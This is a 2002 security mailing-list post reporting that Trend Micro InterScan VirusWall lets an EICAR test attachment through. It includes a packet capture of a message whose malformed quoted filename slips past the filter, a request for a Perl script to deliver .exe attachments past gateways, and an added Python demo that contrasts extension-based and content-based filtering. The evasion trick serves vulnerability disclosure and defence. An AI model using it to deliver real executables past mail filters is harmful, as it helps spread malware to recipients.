bypassing attachments

From: Onie Camara (neil@restricted.dyndns.org)
Date: 02/23/02


From: "Onie Camara" <neil@restricted.dyndns.org>
To: <incidents@securityfocus.com>
Date: Sat, 23 Feb 2002 11:37:29 -0600

Hi guys,

I don't know where to post actually.

I am very interested in security and would like some of your help.

I have found, I hope, a vulnerability in Trend Micro InterScan VirusWall.
I have a setup of qmail and sqwebmail running on FreeBSD. When I send an
email from sqwebmail containing the EICAR test virus attachment, the
attachment is bypassed by InterScan and is successfully delivered.

I have escalated this to Trend Micro since early January and, until now,
even with the latest pattern file, it is still bypassed.

This is somewhat related to the Feb 18 post at
http://www.securiteam.com/securitynews/5DP0I206AY.html

Now, since I will be doing a pentest for another company, I would like some
help on where I can download a Perl script that will send an .exe or .com
attachment to a mail server but will bypass the filtering gateway.

I have used this script: http://www.securiteam.com/exploits/5ZP0D2K6AY.html
It works, but the attachment's extension changes, e.g. eicar.com becomes
eicar._com.

Here is a tcpdump:

bash# tcpdump -x -X -s 14400 port not 22 and port not 53 and not arp and port not 68 and port not 67 and port not 80 and not igmp
tcpdump: listening on xl0
11:23:45.478174 65.192.117.68.1760 > dhcp-74-1628.smtp: S
2796302688:2796302688(0) win 16384 <mss 1460,nop,nop,sackOK,nop,wscale
0,nop,nop,timestamp 546622090 0> (DF)
0x0000 4500 0040 66b1 4000 3406 1f70 41c0 7544 E..@f.@.4..pA.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3160 0000 0000 ..........1`....
0x0020 b002 4000 6b45 0000 0204 05b4 0101 0402 ..@.kE..........
0x0030 0103 0300 0101 080a 2094 ca8a 0000 0000 ................
11:23:45.478679 dhcp-74-1628.smtp > 65.192.117.68.1760: S
1437153606:1437153606(0) ack 2796302689 win 33304 <mss 1460,nop,wscale
0,nop,nop,timestamp 908042 546622090> (DF)
0x0000 4500 003c 0f7c 4000 4006 6aa9 0cf8 fc9a E..<.|@.@.j.....
0x0010 41c0 7544 0019 06e0 55a9 3946 a6ac 3161 A.uD....U.9F..1a
0x0020 a012 8218 d41b 0000 0204 05b4 0103 0300 ................
0x0030 0101 080a 000d db0a 2094 ca8a ............
11:23:45.494674 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 1 win 17376
<nop,nop,timestamp 546622090 908042> (DF)
0x0000 4500 0034 42c4 4000 3406 4369 41c0 7544 E..4B.@.4.CiA.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3947 ..........1aU.9G
0x0020 8010 43e0 3e18 0000 0101 080a 2094 ca8a ..C.>...........
0x0030 000d db0a ....
11:23:45.530047 dhcp-74-1628.smtp > 65.192.117.68.1760: P 1:43(42) ack 1 win
33304 <nop,nop,timestamp 908048 546622090> (DF)
0x0000 4500 005e 7e6d 4000 4006 fb95 0cf8 fc9a E..^~m@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3947 a6ac 3161 A.uD....U.9G..1a
0x0020 8018 8218 e931 0000 0101 080a 000d db10 .....1..........
0x0030 2094 ca8a 3232 3020 7072 6f6d 6973 6375 ....220.promiscu
0x0040 6f75 732e 6479 6e64 6e73 2e6f 7267 2045 ous.dyndns.org.E
0x0050 534d 5450 2050 6f73 7466 6978 0d0a SMTP.Postfix..
11:23:45.553735 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 43 win 17376
<nop,nop,timestamp 546622090 908048> (DF)
0x0000 4500 0034 2223 4000 3406 640a 41c0 7544 E..4"#@.4.d.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971 ..........1aU.9q
0x0020 8010 43e0 3de8 0000 0101 080a 2094 ca8a ..C.=...........
0x0030 000d db10 ....
11:23:45.553933 65.192.117.68.1760 > dhcp-74-1628.smtp: P 1:33(32) ack 43
win 17376 <nop,nop,timestamp 546622090 908048> (DF)
0x0000 4500 0054 5ac7 4000 3406 2b46 41c0 7544 E..TZ.@.4.+FA.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971 ..........1aU.9q
0x0020 8018 43e0 85fe 0000 0101 080a 2094 ca8a ..C.............
0x0030 000d db10 4548 4c4f 2061 6e74 6973 7061 ....EHLO.antispa
0x0040 6d2e 7265 6d69 6e67 746f 6e6c 7464 2e63 m.remingtonltd.c
0x0050 6f6d 0d0a om..
11:23:45.554671 dhcp-74-1628.smtp > 65.192.117.68.1760: P 43:151(108) ack 33
win 33304 <nop,nop,timestamp 908050 546622090> (DF)
0x0000 4500 00a0 b62a 4000 4006 c396 0cf8 fc9a E....*@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3971 a6ac 3181 A.uD....U.9q..1.
0x0020 8018 8218 5f91 0000 0101 080a 000d db12 ...._...........
0x0030 2094 ca8a 3235 302d 7072 6f6d 6973 6375 ....250-promiscu
0x0040 6f75 732e 6479 6e64 6e73 2e6f 7267 0d0a ous.dyndns.org..
0x0050 3235 302d 5049 5045 4c49 4e49 4e47 0d0a 250-PIPELINING..
0x0060 3235 302d 5349 5a45 2032 3030 3030 3030 250-SIZE.2000000
0x0070 300d 0a32 3530 2d56 5246 590d 0a32 3530 0..250-VRFY..250
0x0080 2d45 5452 4e0d 0a32 3530 2d58 5645 5250 -ETRN..250-XVERP
0x0090 0d0a 3235 3020 3842 4954 4d49 4d45 0d0a ..250.8BITMIME..
11:23:45.571627 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 151 win 17268
<nop,nop,timestamp 546622090 908050> (DF)
0x0000 4500 0034 0598 4000 3406 8095 41c0 7544 E..4..@.4...A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd ..........1.U.9.
0x0020 8010 4374 3dc6 0000 0101 080a 2094 ca8a ..Ct=...........
0x0030 000d db12 ....
11:23:45.573727 65.192.117.68.1760 > dhcp-74-1628.smtp: P 33:101(68) ack 151
win 17376 <nop,nop,timestamp 546622090 908050> (DF)
0x0000 4500 0078 01ee 4000 3406 83fb 41c0 7544 E..x..@.4...A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd ..........1.U.9.
0x0020 8018 43e0 4202 0000 0101 080a 2094 ca8a ..C.B...........
0x0030 000d db12 4d41 494c 2046 524f 4d3a 3c3e ....MAIL.FROM:<>
0x0040 2053 495a 453d 3131 3139 0d0a 5243 5054 .SIZE=1119..RCPT
0x0050 2054 4f3a 3c6e 6569 6c40 7265 7374 7269 .TO:<neil@restri
0x0060 6374 6564 2e64 796e 646e 732e 6f72 673e cted.dyndns.org>
0x0070 0d0a 4441 5441 0d0a ..DATA..
11:23:45.580592 dhcp-74-1628.smtp > 65.192.117.68.1760: P 151:204(53) ack
101 win 33304 <nop,nop,timestamp 908053 546622090> (DF)
0x0000 4500 0069 6a03 4000 4006 0ff5 0cf8 fc9a E..ij.@.@.......
0x0010 41c0 7544 0019 06e0 55a9 39dd a6ac 31c5 A.uD....U.9...1.
0x0020 8018 8218 502b 0000 0101 080a 000d db15 ....P+..........
0x0030 2094 ca8a 3235 3020 4f6b 0d0a 3235 3020 ....250.Ok..250.
0x0040 4f6b 0d0a 3335 3420 456e 6420 6461 7461 Ok..354.End.data
0x0050 2077 6974 6820 3c43 523e 3c4c 463e 2e3c .with.<CR><LF>.<
0x0060 4352 3e3c 4c46 3e0d 0a CR><LF>..
11:23:45.607780 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 204 win 17323
<nop,nop,timestamp 546622090 908053> (DF)
0x0000 4500 0034 2d7e 4000 3406 58af 41c0 7544 E..4-~@.4.X.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12 ..........1.U.:.
0x0020 8010 43ab 3d13 0000 0101 080a 2094 ca8a ..C.=...........
0x0030 000d db15 ....
11:23:45.615561 65.192.117.68.1760 > dhcp-74-1628.smtp: P 101:1229(1128) ack
204 win 17376 <nop,nop,timestamp 546622090 908053> (DF)
0x0000 4500 049c 4e19 4000 3406 33ac 41c0 7544 E...N.@.4.3.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12 ..........1.U.:.
0x0020 8018 43e0 715b 0000 0101 080a 2094 ca8a ..C.q[..........
0x0030 000d db15 5265 6365 6976 6564 3a20 6672 ....Received:.fr
0x0040 6f6d 2079 6f75 2028 6c6f 6361 6c68 6f73 om.you.(localhos
0x0050 7420 5b31 3237 2e30 2e30 2e31 5d29 0d0a t.[127.0.0.1])..
0x0060 0962 7920 616e 7469 7370 616d 2e72 656d .by.antispam.rem
0x0070 696e 6774 6f6e 6c74 642e 636f 6d20 2850 ingtonltd.com.(P
0x0080 6f73 7466 6978 2920 7769 7468 2053 4d54 ostfix).with.SMT
0x0090 5020 6964 2036 3730 4237 4538 4434 0d0a P.id.670B7E8D4..
0x00a0 0966 6f72 203c 6e65 696c 4072 6573 7472 .for.<neil@restr
0x00b0 6963 7465 642e 6479 6e64 6e73 2e6f 7267 icted.dyndns.org
0x00c0 3e3b 2053 6174 2c20 3233 2046 6562 2032 >;.Sat,.23.Feb.2
0x00d0 3030 3220 3131 3a31 363a 3137 202d 3036 002.11:16:17.-06
0x00e0 3030 2028 4353 5429 0d0a 4672 6f6d 3a20 00.(CST)..From:.
0x00f0 736f 6d65 4072 656d 696e 6774 6f6e 6c74 some@remingtonlt
0x0100 642e 636f 6d0d 0a54 6f3a 206e 6569 6c40 d.com..To:.neil@
0x0110 7265 7374 7269 6374 6564 2e64 796e 646e restricted.dyndn
0x0120 732e 6f72 670d 0a53 7562 6a65 6374 3a20 s.org..Subject:.
0x0130 7465 7374 0d0a 4d49 4d45 2d56 6572 7369 test..MIME-Versi
0x0140 6f6e 3a20 312e 300d 0a43 6f6e 7465 6e74 on:.1.0..Content
0x0150 2d54 7970 653a 206d 756c 7469 7061 7274 -Type:.multipart
0x0160 2f72 656c 6174 6564 3b0d 0a20 2020 2020 /related;.......
0x0170 2020 2074 7970 653d 226d 756c 7469 7061 ...type="multipa
0x0180 7274 2f61 6c74 6572 6e61 7469 7665 223b rt/alternative";
0x0190 0d0a 2020 2020 2020 2020 626f 756e 6461 ..........bounda
0x01a0 7279 3d22 4e65 7874 5061 7274 3139 220d ry="NextPart19".
0x01b0 0a4d 6573 7361 6765 2d49 643a 203c 3230 .Message-Id:.<20
0x01c0 3032 3032 3233 3137 3136 3137 2e36 3730 020223171617.670
0x01d0 4237 4538 4434 4061 6e74 6973 7061 6d2e B7E8D4@antispam.
0x01e0 7265 6d69 6e67 746f 6e6c 7464 2e63 6f6d remingtonltd.com
0x01f0 3e0d 0a44 6174 653a 2053 6174 2c20 3233 >..Date:.Sat,.23
0x0200 2046 6562 2032 3030 3220 3131 3a31 363a .Feb.2002.11:16:
0x0210 3137 202d 3036 3030 2028 4353 5429 0d0a 17.-0600.(CST)..
0x0220 0d0a 5468 6973 2069 7320 6120 6d75 6c74 ..This.is.a.mult
0x0230 692d 7061 7274 206d 6573 7361 6765 2069 i-part.message.i
0x0240 6e20 4d49 4d45 2066 6f72 6d61 742e 0d0a n.MIME.format...
0x0250 0d0a 2d2d 4e65 7874 5061 7274 3139 0d0a ..--NextPart19..
0x0260 436f 6e74 656e 742d 5479 7065 3a20 6d75 Content-Type:.mu
0x0270 6c74 6970 6172 742f 616c 7465 726e 6174 ltipart/alternat
0x0280 6976 653b 0d0a 2020 2020 2020 2020 626f ive;..........bo
0x0290 756e 6461 7279 3d22 4e65 7874 5061 7274 undary="NextPart
0x02a0 3230 220d 0a0d 0a2d 2d4e 6578 7450 6172 20"....--NextPar
0x02b0 7432 300d 0a43 6f6e 7465 6e74 2d54 7970 t20..Content-Typ
0x02c0 653a 2074 6578 742f 706c 6169 6e0d 0a43 e:.text/plain..C
0x02d0 6f6e 7465 6e74 2d54 7261 6e73 6665 722d ontent-Transfer-
0x02e0 456e 636f 6469 6e67 3a20 7175 6f74 6564 Encoding:.quoted
0x02f0 2d70 7269 6e74 6162 6c65 0d0a 0d0a 2d2d -printable....--
0x0300 4e65 7874 5061 7274 3230 0d0a 436f 6e74 NextPart20..Cont
0x0310 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-Type:.text/h
0x0320 746d 6c3b 0d0a 2020 2020 2020 2020 6368 tml;..........ch
0x0330 6172 7365 743d 2269 736f 2d38 3835 392d arset="iso-8859-
0x0340 3122 0d0a 436f 6e74 656e 742d 5472 616e 1"..Content-Tran
0x0350 7366 6572 2d45 6e63 6f64 696e 673a 2071 sfer-Encoding:.q
0x0360 756f 7465 642d 7072 696e 7461 626c 650d uoted-printable.
0x0370 0a0d 0a74 6573 740d 0a2d 2d4e 6578 7450 ...test..--NextP
0x0380 6172 7432 302d 2d0d 0a0d 0a2d 2d4e 6578 art20--....--Nex
0x0390 7450 6172 7431 390d 0a43 6f6e 7465 6e74 tPart19..Content
0x03a0 2d54 7970 653a 2061 7070 6c69 6361 7469 -Type:.applicati
0x03b0 6f6e 2f78 2d6d 7364 6f77 6e6c 6f61 640d on/x-msdownload.
0x03c0 0a43 6f6e 7465 6e74 2d44 6973 706f 7369 .Content-Disposi
0x03d0 7469 6f6e 3a20 6174 7461 6368 6d65 6e74 tion:.attachment
0x03e0 3b66 696c 656e 616d 653d 2265 6963 6172 ;filename="eicar
0x03f0 2e22 636f 6d22 0d0a 436f 6e74 656e 742d ."com"..Content-
0x0400 5472 616e 7366 6572 2d45 6e63 6f64 696e Transfer-Encodin
0x0410 673a 2062 6173 6536 340d 0a0d 0a57 4456 g:.base64....WDV
0x0420 5049 5641 6c51 4546 5157 7a52 6355 4670 PIVAlQEFQWzRcUFp
0x0430 594e 5451 6f55 4634 704e 304e 444b 5464 YNTQoUF4pN0NDKTd
0x0440 394a 4556 4a51 3046 534c 564e 5551 5535 9JEVJQ0FSLVNUQU5
0x0450 4551 564a 454c 5546 4f56 456c 5753 564a EQVJELUFOVElWSVJ
0x0460 5655 7931 5552 564e 550d 0a4c 555a 4a54 VUy1URVNU..LUZJT
0x0470 4555 684a 4567 7253 436f 4e43 673d 3d0d EUhJEgrSCoNCg==.
0x0480 0a0d 0a2d 2d4e 6578 7450 6172 7431 392d ...--NextPart19-
0x0490 2d0d 0a2e 0d0a 5155 4954 0d0a -.....QUIT..
11:23:45.709692 dhcp-74-1628.smtp > 65.192.117.68.1760: . ack 1229 win 33304
<nop,nop,timestamp 908066 546622090> (DF)
0x0000 4500 0034 cc50 4000 4006 addc 0cf8 fc9a E..4.P@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3a12 a6ac 362d A.uD....U.:...6-
0x0020 8010 8218 fa30 0000 0101 080a 000d db22 .....0........."
0x0030 2094 ca8a ....
11:23:47.074647 dhcp-74-1628.smtp > 65.192.117.68.1760: P 204:243(39) ack
1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
0x0000 4500 005b 9c6c 4000 4006 dd99 0cf8 fc9a E..[.l@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3a12 a6ac 362d A.uD....U.:...6-
0x0020 8018 8218 00bc 0000 0101 080a 000d dbaa ................
0x0030 2094 ca8a 3235 3020 4f6b 3a20 7175 6575 ....250.Ok:.queu
0x0040 6564 2061 7320 3843 4237 3635 3334 3745 ed.as.8CB765347E
0x0050 0d0a 3232 3120 4279 650d 0a ..221.Bye..
11:23:47.074908 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
0x0000 4500 0034 fa45 4000 4006 7fe7 0cf8 fc9a E..4.E@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3a39 a6ac 362d A.uD....U.:9..6-
0x0020 8011 8218 f980 0000 0101 080a 000d dbaa ................
0x0030 2094 ca8a ....
11:23:47.091722 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 243 win 17376
<nop,nop,timestamp 546622093 908202> (DF)
0x0000 4500 0034 4a13 4000 3406 3c1a 41c0 7544 E..4J.@.4.<.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39 ..........6-U.:9
0x0020 8010 43e0 37b7 0000 0101 080a 2094 ca8d ..C.7...........
0x0030 000d dbaa ....
11:23:47.092205 65.192.117.68.1760 > dhcp-74-1628.smtp: F 1229:1229(0) ack
243 win 17376 <nop,nop,timestamp 546622093 908202> (DF)
0x0000 4500 0034 4ca3 4000 3406 398a 41c0 7544 E..4L.@.4.9.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39 ..........6-U.:9
0x0020 8011 43e0 37b6 0000 0101 080a 2094 ca8d ..C.7...........
0x0030 000d dbaa ....
11:23:47.092519 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
1230 win 33304 <nop,nop,timestamp 908204 546622093> (DF)
0x0000 4500 0034 f518 4000 4006 8514 0cf8 fc9a E..4..@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3a39 a6ac 362e A.uD....U.:9..6.
0x0020 8011 8218 f97a 0000 0101 080a 000d dbac .....z..........
0x0030 2094 ca8d ....
11:23:47.097243 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
<nop,nop,timestamp 546622093 908202> (DF)
0x0000 4500 0034 5a93 4000 3406 2b9a 41c0 7544 E..4Z.@.4.+.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a ..........6.U.::
0x0020 8010 43e0 37b5 0000 0101 080a 2094 ca8d ..C.7...........
0x0030 000d dbaa ....
11:23:47.109155 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
<nop,nop,timestamp 546622093 908204> (DF)
0x0000 4500 0034 3e09 4000 3406 4824 41c0 7544 E..4>.@.4.H$A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a ..........6.U.::
0x0020 8010 43e0 37b3 0000 0101 080a 2094 ca8d ..C.7...........
0x0030 000d dbac ....
^C
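
The capture above shows the attachment declared as Content-Disposition: attachment;filename="eicar."com" with a base64 body, and the post notes that a rewritten name such as eicar._com also gets through. The Python below is an added example (not code from the original post, the securiteam script or Trend Micro): it rebuilds a constructed message in that shape and contrasts a gate that trusts the declared extension with one that decodes each part and matches the EICAR test signature in the content. The addresses, the blocklist and the regex of the "naive" gate are assumptions, not any product's logic.

```python
import base64
import re
from email import message_from_string

# Assumed blocklist for an extension-based gateway rule.
BLOCKED_EXTENSIONS = {".com", ".exe"}
# The public 68-byte EICAR test string (backslash escaped so this source file
# is not itself an EICAR test file; the bytes are exact at runtime).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

def build_sample(declared_filename: str) -> str:
    """Constructed message shaped like the capture: a text part plus a base64
    application/x-msdownload attachment. declared_filename is inserted verbatim
    after 'filename=', quotes included, so malformed values can be tested."""
    body = base64.b64encode(EICAR + b"\r\n").decode()
    return (
        "From: some@example.test\r\nTo: neil@example.test\r\nSubject: test\r\n"
        'MIME-Version: 1.0\r\nContent-Type: multipart/mixed; boundary="NextPart19"\r\n'
        "\r\n--NextPart19\r\nContent-Type: text/plain\r\n\r\ntest\r\n"
        "--NextPart19\r\nContent-Type: application/x-msdownload\r\n"
        f"Content-Disposition: attachment;filename={declared_filename}\r\n"
        f"Content-Transfer-Encoding: base64\r\n\r\n{body}\r\n--NextPart19--\r\n"
    )

def naive_declared_extension(raw_message: str) -> str:
    """Extension a header-trusting gate derives: it takes the first double-quoted
    filename token and everything from its last dot ('' when no filename)."""
    for part in message_from_string(raw_message).walk():
        m = re.search(r'filename="([^"]*)"', part.get("Content-Disposition", ""))
        if m:
            name = m.group(1).lower()
            return name[name.rfind("."):] if "." in name else ""
    return ""

def extension_gate_blocks(raw_message: str) -> bool:
    """Decision of the header-trusting gate: block only on a listed extension."""
    return naive_declared_extension(raw_message) in BLOCKED_EXTENSIONS

def content_gate_blocks(raw_message: str) -> bool:
    """Content-based gate: decode every leaf part (honouring its transfer
    encoding) and match the signature, ignoring declared name and MIME type."""
    for part in message_from_string(raw_message).walk():
        if part.is_multipart():
            continue
        if EICAR in (part.get_payload(decode=True) or b""):
            return True
    return False
```

Feeding the declared names "eicar.com", "eicar."com" and "eicar._com" through both gates shows the point: the extension gate stops only the first (it sees "." and "._com" for the other two), while the content gate flags all three.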
